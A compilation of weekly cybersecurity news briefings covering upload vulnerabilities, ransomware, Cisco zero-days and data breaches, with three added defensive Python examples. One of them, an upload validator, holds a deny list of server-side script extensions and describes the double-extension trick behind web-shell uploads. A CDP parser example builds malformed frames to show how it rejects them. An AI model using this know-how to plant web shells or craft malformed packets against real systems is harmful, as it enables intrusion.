Through the use of an automated testing toolkit, a team of South Korean academics has discovered 30 vulnerabilities in the file upload mechanisms used by 23 open-source web applications, forums, store builders, and content management systems (CMSes).
When present in real-world web apps, these types of vulnerabilities allow hackers to exploit file upload forms and plant malicious files on a victim's servers.
These files could be used to execute code on a website, weaken existing security settings, or function as backdoors, allowing hackers full control over a server.
Read the full article here: https://www.zdnet.com/article/academics-find-30-file-upload-vulnerabilities-in-23-web-apps-cmses-and-forums/
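The defences that close off the upload abuse described above are mostly input validation on the server side. The following is an added example written for this briefing, not code from the paper or from any of the 23 applications: a validator that uses the client-supplied filename only for its final extension, rejects double extensions and dotfiles, checks that the leading bytes match the claimed type, and then stores the file under a random server-chosen name outside the web root with `O_EXCL` so nothing is overwritten. The allowlist, the list of server-side extensions and the size cap are constructed for the example and should be tailored to the application.

```python
import os
import secrets

# Allowed extensions and the leading bytes a file of that type must carry.
# Constructed allowlist for the example; tailor it to what the app really serves.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
# Extensions that must never appear anywhere in the name (double-extension trick).
SERVER_SIDE_EXTS = {"php", "phtml", "php5", "phar", "jsp", "jspx", "asp", "aspx",
                    "cgi", "pl", "py", "sh", "htaccess"}
MAX_BYTES = 5 * 1024 * 1024  # constructed size cap


def check_upload(client_name, data):
    """Return (True, server_chosen_name) or (False, reason).
    The client-supplied name is consulted only for its final extension."""
    name = os.path.basename(client_name.replace("\\", "/"))  # drop any path part
    if not name or any(ord(c) < 32 for c in name):
        return False, "empty name or control characters"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension or dotfile"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not allowed"
    if any(p in SERVER_SIDE_EXTS for p in parts[1:-1]):
        return False, "double extension"
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # Never reuse the client's name: a random server-chosen name defeats
    # overwrite and traversal tricks and leaks nothing about other uploads.
    return True, f"{secrets.token_hex(16)}.{ext}"


def store_upload(upload_root, client_name, data):
    """Validate, then write under upload_root, which must be a directory
    outside the web root and not mapped to any script handler. O_EXCL makes
    the write fail rather than replace an existing file."""
    ok, info = check_upload(client_name, data)
    if not ok:
        raise ValueError(info)
    path = os.path.join(upload_root, info)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path
```

Checking the leading bytes is a cheap sanity check, not a full content scan: a file can carry a valid image header and still contain script text further in. That is why the stored name and location matter as much as the validation; a file that the web server will never hand to an interpreter cannot become a web shell even if the content check is fooled.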
UK Home Office breached GDPR 100 times through botched management of EU Settlement Scheme
ID cards sent to the wrong addresses, third party data disclosures, and lost passports are only some examples of mishandling.
The UK Home Office has breached European data protection regulations at least 100 times in its handling of the EU Settlement Scheme (EUSS).
IDs have been lost, documents misplaced, passports have gone missing, and applicant information has been disclosed to third parties without permission in some of the cases, according to a new report.
Read more here: https://www.zdnet.com/article/uk-home-office-breached-gdpr-100-times-through-botched-handling-of-eu-settlement-scheme/
Legal services giant Epiq Global offline after ransomware attack
The company, which provides legal counsel and administration services and counts banks, credit giants, and governments as customers, confirmed the attack hit on February 29.
“As part of our comprehensive response plan, we immediately took our systems offline globally to contain the threat and began working with a third-party forensic firm to conduct an independent investigation,” a company statement read. “Our technical team is working closely with world class third-party experts to address this matter, and bring our systems back online in a secure manner, as quickly as possible.”
The company’s website, however, says it was “offline to perform maintenance.”
A source with knowledge of the incident but who was not authorized to speak to the media said the ransomware hit the organization’s entire fleet of computers across its 80 global offices.
Read more here: https://techcrunch.com/2020/03/02/epiq-global-ransomware/
Android Patch Finally Lands for Widespread “MediaTek-SU” Vulnerability
Android has quietly patched a critical security flaw affecting millions of devices containing chipsets from Taiwanese semiconductor MediaTek: a full year after the security vulnerability – which gives an attacker root privileges – was first reported.
More here: https://www.cbronline.com/news/android-patch-mediatek-su
5G and IoT security: Why cybersecurity experts are sounding an alarm
Without regulation and strong proactive measures, 5G networks remain vulnerable to cyberattacks, and the responsibility falls on businesses and governments.
Seemingly everywhere you turn these days there is some announcement about 5G and the benefits it will bring, like greater speeds, increased efficiencies, and support for up to one million device connections on a private 5G network. All of this leads to more innovations and a significant change in how we do business.
But 5G also creates new opportunities for hackers.
There are five ways in which 5G networks are more susceptible to cyberattacks than their predecessors, according to the 2019 Brookings report, Why 5G requires new approaches to cybersecurity. They are:
The network has moved from centralized, hardware-based switching to distributed, software-defined digital routing. Previous networks had "hardware choke points" where cyber hygiene could be implemented. Not so with 5G.
Higher-level network functions formerly performed by physical appliances are now being virtualized in software, increasing cyber vulnerability.
Even if software vulnerabilities within the network are locked down, the 5G network is now managed by software. That means an attacker that gains control of the software managing the network can also control the network.
The dramatic expansion of bandwidth in 5G creates additional avenues of attack.
Attaching tens of billions of hackable smart devices to the network as IoT endpoints increases vulnerability further.
Read the full article here: https://www.techrepublic.com/article/5g-and-iot-security-why-cybersecurity-experts-are-sounding-an-alarm/
Virgin Media apologises after data breach affects 900,000 customers
Virgin Media has apologised after a data breach left the personal details of around 900,000 customers unsecured and accessible.
The company said that the breach occurred after one of its marketing databases was “incorrectly configured” which allowed unauthorised access.
It assured those affected by the breach that the database “did not include any passwords or financial details” but said it contained information such as names, home and email addresses, and phone numbers.
Virgin said that access to the database had been shut down immediately following the discovery but by that time the database was accessed “on at least one occasion”.
Read more here: https://www.itv.com/news/2020-03-05/virgin-media-apologises-after-data-breach-affects-900-000-customers/
Do these three things to protect your web security camera from hackers
NCSC issues advice on how to keep connected cameras, baby monitors and other live streaming security tools secure from cyberattacks.
Owners of smart cameras, baby monitors and other Internet of Things products have been urged to help keep their devices safe by following three simple steps to boost cybersecurity – and making it more difficult for hackers to compromise them.
The advice from the UK's National Cyber Security Centre (NCSC) – the cyber arm of the GCHQ intelligence agency – comes as IoT security cameras and other devices are gaining popularity in households and workplaces.
Change the default password
Apply updates regularly
Disable unnecessary alerts
For more refer to the original article here: https://www.zdnet.com/article/do-these-three-things-to-protect-your-web-security-camera-from-hackers/
Cyber Weekly Flash Briefing for 14 February 2020 – Microsoft patches 99 vulns, Nedbank 1.7m customer breach, PC malware spreads via WiFi, Cybercrime losses triple
Microsoft Patch Tuesday fixes IE zero‑day and 98 other flaws
This month’s Patch Tuesday fell this week and it came with fixes for no fewer than 99 security vulnerabilities in Windows and other Microsoft software.
Twelve flaws have received the highest severity ranking of “critical”, while 5 security holes are listed as publicly known at the time of release.
In fact, one vulnerability ticks both boxes – an actively exploited zero-day in Internet Explorer (IE). Microsoft disclosed this flaw, indexed as CVE-2020-0674, three weeks ago but didn’t roll out a patch until now. Successful exploitation of this remote code execution (RCE) vulnerability enables remote attackers to run code of their choice on the vulnerable system.
Another 16 RCE holes are being plugged as part of this month’s bundle of security patches. This includes two severe vulnerabilities in the Windows Remote Desktop Client, CVE-2020-0681 and CVE-2020-0734, where exploitation is seen as likely by Microsoft.
Updates have been released for various flavours of Windows, as well as for Office, Edge, Exchange Server, SQL Server and a few more products. The number of fixes this month is unusually high; for example, last month’s Patch Tuesday rollout fixed 49 vulnerabilities.
Read more here: https://www.welivesecurity.com/2020/02/12/microsoft-patch-tuesday-fixes-99-vulnerabilities-ie-zero-day/
Nedbank says 1.7 million customers impacted by breach at third-party provider
Nedbank, one of the biggest banks in South Africa, disclosed a security incident yesterday that impacted the personal details of 1.7 million users.
The bank says the breach occurred at Computer Facilities (Pty) Ltd, a South African company the bank was using to send out marketing and promotional campaigns.
In a security notice posted on its website, Nedbank said there was a vulnerability in the third-party provider's systems that allowed an attacker to infiltrate its systems.
The data of 1.7 million past and current customers is believed to have been affected. Details stored on the contractor's systems included things like names, ID numbers, home addresses, phone numbers, and email addresses.
The bank began notifying customers about the breach yesterday.
More information here: https://www.zdnet.com/article/nedbank-says-1-7-million-customers-impacted-by-breach-at-third-party-provider/
Why you can’t bank on backups to fight ransomware anymore
Ransomware operators stealing data before they encrypt means backups are not enough.
The belief that no personally identifying information gets breached in ransomware attacks is common among victims of ransomware—and that's partially because ransomware operators had previously avoided claiming they had access to victims' data in order to maintain the "trust" required to extract a payment. Cyber insurance has made paying out an attractive option in cases where there's no need for an organisation to reveal a breach, so the economics had favoured ransomware attackers who provided good "customer service" and gave (usually believable) assurances that no data had been taken off the victims' networks.
Unfortunately, that sort of model is being blown up by the Maze and Sodinokibi (REvil) ransomware rings, which have adopted a model of using stolen data as leverage to ensure customers will make a payment. Even in cases where a victim can relatively quickly recover from a ransomware attack, they still will face demands for payment in order to avoid the publication or sale of information stolen by the attackers before the ransomware was triggered.
Read more here: https://arstechnica.com/information-technology/2020/02/why-you-cant-bank-on-backups-to-fight-ransomware-anymore/
Newly discovered PC malware version spreads through Wi-Fi networks
A new version of a highly sophisticated Trojan that can spread via Wi-Fi networks has been discovered. The Emotet Trojan, which also acts as a loader for other malware, has been found to take advantage of the wlanAPI interface to spread to all PCs on a network through Wi-Fi. The Trojan was previously known to spread only through spam emails and infected networks.
The ability of this Trojan to brute force its way into networks through Wi-fi from the infected PC has supposedly gone undetected for at least two years. When the malicious software enters into a system, it begins listing and profiling wireless networks using the wlanAPI.dll calls so that it can spread to any networks that are accessible. This is because the wlanAPI.dll calls are used by Native Wi-Fi to manage wireless network profiles and wireless network connections.
Read more here: https://www.neowin.net/news/newly-discovered-pc-malware-version-spreads-through-wi-fi-networks/
Why the ransom is only a fraction of the cost of a ransomware attack
The expense of dealing with a ransomware attack is far in excess of what was previously thought, according to a report published on Tuesday.
The estimate for the total ransom payments demanded in 2019 was $25 billion. But this is only one seventh of the actual cost to the companies affected, which could be as much as $170 billion, according to estimates. Most of these costs arise from downtime and are associated with dealing with the attack, rather than the ransom itself, according to the report.
Read more here: https://decrypt.co/19084/why-ransom-fraction-cost-ransomware-attack
5 Critical Zero-day Vulnerabilities Affected Tens of Millions of Cisco Switches, Routers, IP Phones and Cameras
Researchers discovered 5 critical zero-day vulnerabilities (dubbed CDPwn) in Cisco Discovery Protocol that are used in multiple Cisco products such as Routers, Switches, IP phones, Cameras and more.
Cisco Discovery Protocol (CDP) is a Cisco proprietary Layer 2 (Data Link Layer) network protocol implemented in virtually all Cisco products, including switches, routers, IP phones, and cameras, to discover information about neighbouring Cisco equipment.
Four of the five vulnerabilities are remote code execution (RCE) vulnerabilities affecting tens of millions of devices, and they allow attackers to completely take over the vulnerable devices without any sort of user interaction.
The fifth causes a denial of service in the CDP implementation of Cisco FXOS, IOS XR and NX-OS Software on targeted routers and can, in turn, completely disrupt target networks.
Read more here: https://gbhackers.com/zero-day-vulnerability-affected-cisco-cdp-devices/
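Flaws of this kind in a Layer 2 protocol typically come down to trusting the length field of a type-length-value (TLV) element before checking it against the frame. The following is an added example written for this briefing, not Cisco's code and not a reproduction of any of the five flaws: a strict parser for the CDP payload layout (a 4-byte header of version, TTL and checksum, followed by TLVs whose 2-byte length includes the 4-byte TLV header) that refuses a TLV whose length is shorter than its own header or runs past the end of the frame. The sample frames, the TLV name table and the TLV cap are constructed for the example; the checksum is carried but not verified here.

```python
import struct

# TLV type codes from the public CDP description; a constructed subset used
# by the example, not the full list.
CDP_TLV_NAMES = {
    0x0001: "Device-ID",
    0x0003: "Port-ID",
    0x0005: "Software-Version",
    0x0006: "Platform",
}
CDP_HEADER_LEN = 4   # version(1) ttl(1) checksum(2)
TLV_HEADER_LEN = 4   # type(2) length(2); the length counts the header itself
MAX_TLVS = 64        # constructed sanity cap against TLV flooding


class CdpParseError(ValueError):
    pass


def parse_cdp(payload):
    """Parse a CDP payload (the bytes after the SNAP header) into
    (version, ttl, [(tlv_type, value_bytes), ...]). Every length is checked
    against the frame before a single value byte is read."""
    if len(payload) < CDP_HEADER_LEN:
        raise CdpParseError("payload shorter than CDP header")
    version, ttl, _checksum = struct.unpack_from("!BBH", payload, 0)
    if version not in (1, 2):
        raise CdpParseError(f"unsupported CDP version {version}")
    tlvs = []
    offset = CDP_HEADER_LEN
    while offset < len(payload):
        if len(payload) - offset < TLV_HEADER_LEN:
            raise CdpParseError("truncated TLV header")
        tlv_type, tlv_len = struct.unpack_from("!HH", payload, offset)
        if tlv_len < TLV_HEADER_LEN:
            raise CdpParseError(f"TLV 0x{tlv_type:04x}: length {tlv_len} smaller than header")
        if offset + tlv_len > len(payload):
            raise CdpParseError(f"TLV 0x{tlv_type:04x}: length {tlv_len} overruns payload")
        if len(tlvs) >= MAX_TLVS:
            raise CdpParseError("too many TLVs")
        tlvs.append((tlv_type, payload[offset + TLV_HEADER_LEN:offset + tlv_len]))
        offset += tlv_len
    return version, ttl, tlvs


def is_well_formed(payload):
    """True if the frame parses under the strict rules above."""
    try:
        parse_cdp(payload)
        return True
    except CdpParseError:
        return False


def device_id(tlvs):
    """Return the Device-ID string, or None if the frame carried none."""
    for tlv_type, value in tlvs:
        if tlv_type == 0x0001:
            return value.decode("ascii", errors="replace")
    return None


def build_tlv(tlv_type, value):
    """Encode one TLV; used only to construct the sample frames below."""
    return struct.pack("!HH", tlv_type, TLV_HEADER_LEN + len(value)) + value


# Constructed sample: a well-formed version-2 announcement (checksum left at 0).
GOOD_FRAME = (struct.pack("!BBH", 2, 180, 0)
              + build_tlv(0x0001, b"switch01")
              + build_tlv(0x0006, b"constructed-platform")
              + build_tlv(0x0003, b"GigabitEthernet0/1"))
# Constructed malformed samples: a length below the header size, and a
# length that points past the end of the frame.
BAD_SHORT_LEN = struct.pack("!BBH", 2, 180, 0) + struct.pack("!HH", 0x0001, 2) + b"xx"
BAD_OVERRUN = struct.pack("!BBH", 2, 180, 0) + struct.pack("!HH", 0x0001, 0x00FF) + b"switch01"

if __name__ == "__main__":
    _, _, good_tlvs = parse_cdp(GOOD_FRAME)
    print("device:", device_id(good_tlvs))
    print("short-length frame ok?", is_well_formed(BAD_SHORT_LEN))
    print("overrun frame ok?", is_well_formed(BAD_OVERRUN))
```

The two malformed frames are exactly the cases a length-trusting implementation mishandles: a length smaller than the header produces a negative or wrapped value size, and a length past the end of the frame makes the parser read (or copy) memory it was never handed. Rejecting both before any copy is the whole of the fix for that bug class.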
Average tenure of a CISO is just 26 months due to high stress and burnout
Chief Information Security Officers (CISOs, or CSOs) across the industry are reporting high levels of stress.
Many say the heightened stress levels have led to mental and physical health issues, relationship problems, medication and alcohol abuse, and in some cases, an eventual burnout, resulting in an average 26-month tenure before CISOs find new employment.
The numbers, reported by Nominet, represent a growing issue that's been commonly acknowledged, but mostly ignored across the information security (infosec) community, but one that is slowly starting to rear its ugly head as once-ignored infosec roles are becoming more prominent inside today's companies.
Today, many companies are adopting CISO roles. The constant threat of hacks, ransomware, phishing, and online scams makes establishing a cyber-security department in any company an unavoidable decision.
However, most companies are not ready to embed CISOs into their company culture and day-to-day operations.
Today, CISO jobs come with low budgets, long working hours, a lack of power on executive boards, a diminishing pool of trained professionals they can hire, but also a constant stress of not having done enough to secure the company's infrastructure against cyber-attacks, continuous pressure due to newly arising threats, and little thanks for the good work done, but all the blame if everything goes wrong.
Across the years, many CISOs have often pointed out the problems with their jobs and the stress and damage they inflict. However, there has been no conclusive study to support broad assertions.
Read the full article here: https://www.zdnet.com/article/average-tenure-of-a-ciso-is-just-26-months-due-to-high-stress-and-burnout/
Ex-GCHQ spy chief says scammers are running rings around Google
Bogus investment and savings adverts banned by Google are reappearing at the top of its search results because con artists can easily circumvent the internet giant’s systems, according to a former spy.
Scammers are able to dupe the world’s most powerful search engine simply by making slight alterations to the names of their fake firms.
For example, one website, info.bond-finder.co.uk, appeared at the top of Google’s search results when consumers typed in “best fixed rate Isa”. But the website had the same contact details as another site, bonds-finder.com, which was identified by the financial regulator, the Financial Conduct Authority (FCA), as a likely scam in January and deleted by Google.
Google launched an investigation after it was alerted to the matter by this newspaper and, after a connection between the two sites was confirmed, the advert was removed.
The company has been in talks with the FCA for almost a year about how to solve the problem of unregulated investment firms and fraudsters duping consumers by paying to appear first in search results through Google’s Ads service.
Read more here: https://www.telegraph.co.uk/money/consumer-affairs/ex-gchq-spy-chief-says-scammers-running-rings-around-google/
FBI: Cybercrime losses tripled over the last 5 years
In 2019, the United States’ Federal Bureau of Investigation (FBI) received more than 467,000 cybercrime complaints that caused an estimated US$3.5 billion in losses, according to the Bureau’s annual 2019 Internet Crime Report (IC3). Last year saw both the highest number of complaints and the highest dollar losses on record; in 2015, for example, annual losses totaled ‘only’ US$1.1 billion.
Business Email Compromise (BEC) fraud remains the costliest type of fraud on the list, accounting for more than half of the total losses and costing businesses almost US$1.8 billion. These schemes are constantly evolving, too. Back in 2013, scammers would typically hack or spoof the email account of a CEO or CFO to request a fraudulent transfer of funds to accounts under their control. Over the years the tactics have evolved to also include compromising personal or vendor emails as well as spoofing lawyers’ email accounts.
Payroll diversion emerged as a popular form of BEC fraud last year. Scammers target HR and payroll departments by acting as employees who want to update their direct deposit information for the current payment period. The updated information then usually directs the funds to a pre-paid card account.
Elder fraud is also an increasingly pressing issue. With 68,013 victims, this type of fraud had the highest number of victims; under-twenties claimed “just” 10,724 victims. The number of victims may not reflect the true extent of the problem since providing the age range is voluntary.
Week in review 29 December 2019 Round up of the most significant open source stories of the last week
Black Arrow Cyber Security review of top open source news articles for week ending 29 December 2019: 10 biggest hacks of the decade, biggest malware threats, MI6 floorplans lost, Citrix vulnerabilities, popular chat app actually spying tool, jobs in infosec
Black Arrow Cyber Consulting would like to wish everyone a happy, prosperous, and cyber safe, 2020
A bit of a quiet week as one would expect with Christmas festivities. As it’s the end of the year, and indeed the end of a decade, there are lots of round ups of the last year and the last decade, and a lot of predictions for what 2020 will hold (we suspect more bad stuff, more ransomware and more devious and nasty strains of ransomware at that, and more breaches) and in that vein on to our first story:
The 10 biggest data hacks of the decade
This article comes from CNBC in the US and whilst the content is US centric a lot of people on this side of the Atlantic would have been caught up in a lot of these breaches too.
Since 2010, data breaches have exposed over 38 billion records, and there have been at least 40,650 data hacks in this time. And while many were smaller data breaches, there were a few mega hacks that will likely remain records for years to come.
Amongst the biggest breaches are:
UnderArmour (MyFitnessPal), from March 2018 with 143.6 million records hacked
Equifax from September 2017 with 147 million records hacked
Marriott (Starwood) from November 2018 with 383 million records hacked
Veeam from September 2018 with 445 million records hacked
Yahoo! from September and December 2016 with up to 3 billion records hacked
There have been many other breaches affecting other companies, such as WhatsApp and Fortnite, who have reported security flaws in the past year that could have exposed millions of customers’ data, but the extent of the accessed data has not yet been fully ascertained.
Read the full article here: https://www.cnbc.com/2019/12/23/the-10-biggest-data-hacks-of-the-decade.html
Live visualisations of the World’s Biggest Data Breaches and Hacks can be found anytime here: https://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Biggest Malware Threats of 2019
2019 was another banner year for bots, trojans, RATS and ransomware. Let’s take a look back.
One out of five computer users was subject to at least one malware-class web attack in 2019. This past year cities such as New Orleans were under ransomware siege by the likes of the Ryuk malware. Zero-day vulnerabilities were also in no short supply, with targets such as Google Chrome and Operation WizardOpium.
Threatpost have taken a look back over their coverage from the last 12 months.
Remote desktop protocol vulnerabilities BlueKeep, and then DejaBlue, allowed unauthenticated, remote attackers to exploit and take complete control of targeted endpoints. The fear of BlueKeep and its wormable potential to mimic WannaCry forced Microsoft’s hand to patch systems as old as Windows XP and Windows 2000.
This past year had its fair share of zero-day vulnerabilities. One of the most prominent of the zero days was Urgent/11, comprising 11 remote code execution vulnerabilities in the real-time OS VxWorks. Because of VxWorks’ use in so many critical infrastructure devices, the U.S. Food and Drug Administration took the unusual step of releasing a warning, urging admins to patch.
We were warned last year when mitigating against Meltdown and Spectre that we would face more side-channel related CPU flaws in the future. And this year we did, with variants ranging from ZombieLoad to Bounds Check Bypass Store, Netspectre and NetCAT. For 2020? Expect even more variants, say experts.
2019 was the year ransomware criminals turned their attention away from consumers and started focusing on big targets such as hospitals, municipalities and schools. There was the Ryuk attack against New Orleans, Maze ransomware behind Pensacola attack and rash of attacks against hospitals that resulted in some care facilities turning patients away.
Botnets continued to be a key tool in cyberattacks in 2019. This past year saw the return of the notorious Emotet botnet. Crooks behind Trickbot partnered with bank trojan cybercriminals from IcedID and Ursif. Lastly, Echobot, an IoT botnet, cast a wider net in 2019 with a raft of exploit additions.
Perhaps the highest-profile cryptominer attack occurred in May when researchers found 50,000 servers were infected for over four months as part of a high-profile cryptojacking campaign featuring the malware Nansh0u. The past year also saw a new XMRig-based cryptominer called Norman emerge, which stood apart because of its clever ability to go undetected.
Even though the device is smaller, mobile devices offer criminals top-tier data, and not only APTs but garden-variety crooks are shifting their focus to mobile. Take, for example, the Anubis mobile banking trojan, which only goes into action once it senses the targeted device is in motion (a check intended to defeat analysis sandboxes, which rarely move). Then there was the Instagram-initiated campaign using the Gustuff Android banking trojan that rolled out in October.
In August, Google's Project Zero detailed five exploit chains, built from 14 iOS vulnerabilities, that Google's Threat Analysis Group (TAG) had found being used in the wild against every iOS version released since September 2016. The chains were delivered through a watering-hole attack that lasted years, and the implant they dropped could steal messages, photos and GPS coordinates. Google said the payload was a custom implant built for monitoring.
In May, researchers uncovered a unique Linux-based malware dubbed HiddenWasp that targeted systems to remotely control them. The malware is believed to be used as part of a second-stage attack against already-compromised systems and is composed of a rootkit, trojan and deployment script.
Discussing malware without touching on business email compromise-based attacks would be like talking about the New England Patriots without mentioning Tom Brady. Fake Greta Thunberg emails were used to lure victims into downloading Emotet. Of course the Swedish climate-change activist was just the latest of many lures; in 2018 alone, scams of this kind contributed to 351,000 reported complaints with losses exceeding $2.7 billion.
Read the original article here: https://threatpost.com/biggest-malware-threats-of-2019/151423/
7 types of virus – a short glossary of contemporary cyberbadness
Technically, this article is about malware in general, not about viruses in particular.
These days, however, the crooks don’t really need to program auto-spreading into their malware – thanks to always-on internet connectivity, the “spreading” part is easier than ever, so that’s one attention-grabbing step the crooks no longer need to use.
But the word virus has remained as a synonym for malware in general, and that’s how we’re using the word here.
So, for the record, here are seven categories of malware that give you a fair idea of the breadth and the depth of the risk that malware can pose to your organisation.
Read the full article here: https://nakedsecurity.sophos.com/2019/12/28/7-types-of-virus-a-short-glossary-of-contemporary-cyberbadness/
MI6 floor plans lost by building contractor
Floor plans of MI6's central London headquarters were lost by building contractors during a refurbishment.
The documents, most of which were recovered inside the building, held sensitive information on the layout, including entry and exit points.
Balfour Beatty, the company working on the refurbishment at the headquarters in Vauxhall, is reportedly no longer working on the project.
The Foreign Office said it did not comment on intelligence matters.
The documents, which went missing a few weeks ago, were produced and owned by Balfour Beatty and designed to be used for the refurbishment.
The contractor kept the plans on the site at Vauxhall Cross in a secure location.
BBC security correspondent Gordon Corera said the missing plans were not classified or intelligence documents, but the pages did hold sensitive details.
Most, but not all, of the documents were recovered inside the building after it was noticed they were missing, he said.
Balfour Beatty said it could not comment because of sensitivities.
The incident, first reported by the Sun newspaper, is reportedly a result of carelessness, rather than any hostile activity.
Read the original article here: https://www.bbc.co.uk/news/uk-50927854
Citrix vulnerability puts 80,000 companies at risk of attack
Researchers have found a vulnerability in popular enterprise software offerings from Citrix which puts tens of thousands of companies at risk of cyber attack.
A security researcher uncovered a critical vulnerability (CVE-2019-19781) in Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) which allows an unauthenticated attacker on the internet direct access to a company's internal network.
According to a report on the flaw, around 80,000 companies in 158 countries around the world could be at risk. Most companies are located in the US, with the UK, Germany, the Netherlands and Australia sharing a significant portion.
Read the full article here: http://www.itproportal.com/news/citrix-vulnerability-allows-criminals-to-hack-80000-companies
Popular chat app ToTok is actually a spying tool of UAE government – report
A chat app that quickly became popular in the United Arab Emirates for communicating with friends and family is actually a spying tool used by the government to track its users, according to a New York Times report.
The government uses ToTok to track conversations, locations, images and other data of those who install the app on their phones, the Times reported, citing US officials familiar with a classified intelligence assessment and the newspaper’s own investigation.
The Emirates has long blocked Apple’s FaceTime, Facebook’s WhatsApp and other calling apps. Emirati media has been playing up ToTok as an alternative for expatriates living in the country to call home to their loved ones for free.
The Times says ToTok is a few months old and has been downloaded millions of times, with most of its users in the Emirates, a US-allied federation of seven sheikhdoms on the Arabian peninsula. Government surveillance in the Emirates is prolific, and the Emirates has long been suspected of using so-called "zero-day" exploits to target human rights activists and others. Zero-day exploits can be expensive to obtain on the black market because they target software vulnerabilities for which no fix yet exists.
The Times described ToTok as a way to give the government free access to personal information: millions of users are willingly downloading and installing the app on their phones and unknowingly granting it the permissions it needs.
As with many apps, ToTok requests location information, purportedly to provide accurate weather forecasts, according to the Times. It also requests access to a phone’s contacts, supposedly to help users connect with friends. The app also has access to microphones, cameras, calendar and other data.
Read the full article here: https://www.theguardian.com/world/2019/dec/23/totok-popular-chat-app-spying-tool-uae-government
Jobs in Information Security (InfoSec)
For anyone considering a career in cyber or information security (infosec) there is a useful article detailing different roles and different potential areas of work in this field.
We also run a free mentoring program for anyone either looking to move into cyber security or currently in a cyber security role wanting to progress their careers. Contact us for more information.
Read the article here: https://medium.com/bugbountywriteup/jobs-in-information-security-infosec-93a5efc12ca2
Week in review 08 December 2019: 5,183 breaches in first nine months of 2019, 44 million Microsoft customers found using compromised passwords, US charges Russians over hacking attacks, VPN vulnerabilities, ransomware attacks on network storage devices, Europol take down counterfeit websites, reward offered for Russian hackers largest yet
Round up of the most significant open source stories of the last week
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
5,183 breaches in first nine months of 2019 exposed 7.9b data records
As many as 7.9 billion data records were leaked, stolen or exposed as a result of 5,183 data breaches that took place in the first nine months of 2019, making it the worst year ever for data breaches.
This alarming statistic was revealed by security firm Risk Based Security which observed that based on recent trends, the number of breached data records could touch 8.5 billion by the end of the year.
The firm also noted that the total number of data breaches worldwide rose by 33.3 percent compared with the same period in 2018, and the number of records breached rose by 112 percent. As many as 3.1 million data records were breached as a result of six data breach incidents that took place between 1 July and 30 September.
The majority of data records were exposed or leaked as a result of accidental exposure of data on the internet by organisations. The fact that hackers are quite willing to take advantage of such data exposure has also led to a rise in the number of breached records.
44 million Microsoft customers found using compromised passwords
Microsoft's identity threat researchers have revealed that 44 million of its users are still using passwords that have previously been compromised in past data breaches.
The 44 million weak accounts comprised both Microsoft Services Accounts (regular users) and Azure AD accounts, suggesting businesses are not enforcing proper password hygiene either.
A total of three billion user credentials were checked in a database populated from numerous sources including law enforcement and public databases.
Using the data set of three billion credentials, Microsoft was able to identify the number of users who were reusing credentials across multiple online services.
Microsoft forced a password reset for all of those users who were found to have leaked credentials during the scan which took place between January and March 2019.
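As an added illustration (not code from the Microsoft research or the article), here is the k-anonymity style check that lets an identity service test passwords against a breach corpus without ever sending the plaintext or the full hash to whoever holds the corpus. The corpus, its counts and the accounts below are constructed for the example; a real deployment would query the Have I Been Pwned "Pwned Passwords" range API (whose prefix-lookup shape is assumed here) or an internal copy of leaked credentials, and would run the check at login or password-change time, the only moment the plaintext is legitimately available.

```python
import hashlib
import hmac
from typing import Dict, List, Tuple

# Constructed stand-in for a breach-credential corpus (password -> times seen).
# The counts are invented for the example.
LEAKED_PASSWORDS: Dict[str, int] = {
    "password": 3_861_493,
    "123456": 23_597_311,
    "qwerty": 3_946_737,
    "Winter2019!": 412,
}

# Constructed sample of accounts to audit. Plaintext is only ever in hand at
# authentication time in a real system; it is never stored like this.
SAMPLE_ACCOUNTS: Dict[str, str] = {
    "alice": "password",
    "bob": "c0rrect-horse-battery-staple-7",
    "carol": "Winter2019!",
}

RangeIndex = Dict[str, List[Tuple[str, int]]]


def sha1_upper(password: str) -> str:
    """Uppercase hex SHA-1, the hash form used by the Pwned Passwords range API."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(leaked: Dict[str, int]) -> RangeIndex:
    """Index leaked hashes by their first five hex digits: prefix -> [(suffix, count)].
    This is the server-side shape behind a k-anonymity range lookup."""
    index: RangeIndex = {}
    for pw, count in leaked.items():
        digest = sha1_upper(pw)
        index.setdefault(digest[:5], []).append((digest[5:], count))
    return index


def range_lookup(index: RangeIndex, prefix: str) -> List[Tuple[str, int]]:
    """Simulates GET /range/{prefix}: every suffix sharing the 5-character prefix.
    Only the prefix leaves the client, so the corpus owner learns neither the
    password nor its full hash."""
    return index.get(prefix.upper(), [])


def times_seen(password: str, index: RangeIndex) -> int:
    """How often the password appears in the corpus (0 = not found)."""
    digest = sha1_upper(password)
    prefix, suffix = digest[:5], digest[5:]
    for candidate, count in range_lookup(index, prefix):
        # Constant-time comparison so response timing doesn't reveal a near miss.
        if hmac.compare_digest(candidate, suffix):
            return count
    return 0


def accounts_to_reset(accounts: Dict[str, str], index: RangeIndex) -> List[str]:
    """Usernames whose password is in the corpus: force these through a reset."""
    return sorted(user for user, pw in accounts.items() if times_seen(pw, index) > 0)


if __name__ == "__main__":
    idx = build_range_index(LEAKED_PASSWORDS)
    for user in accounts_to_reset(SAMPLE_ACCOUNTS, idx):
        print(f"{user}: password seen {times_seen(SAMPLE_ACCOUNTS[user], idx)} times, force reset")
```

The useful property is the split: the client hashes locally and discloses only five hex characters, which map to hundreds of candidate suffixes, so even the lookup service cannot tell which password was being checked. Pair the check with a forced reset and, as the article says, with MFA, since a reset alone does nothing about the reuse habit that put the credential in the corpus.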
Evil Corp: US charges Russians over hacking attacks
US authorities have filed charges against two Russian nationals alleged to be running a global cyber crime organisation named Evil Corp.
An indictment named Maksim Yakubets and Igor Turashev - who remain at large - as figures in a group which used malware to steal millions of dollars in more than 40 countries.
Those affected by the hacks include schools and religious organisations. It is also alleged that Mr Yakubets worked for Russian intelligence.
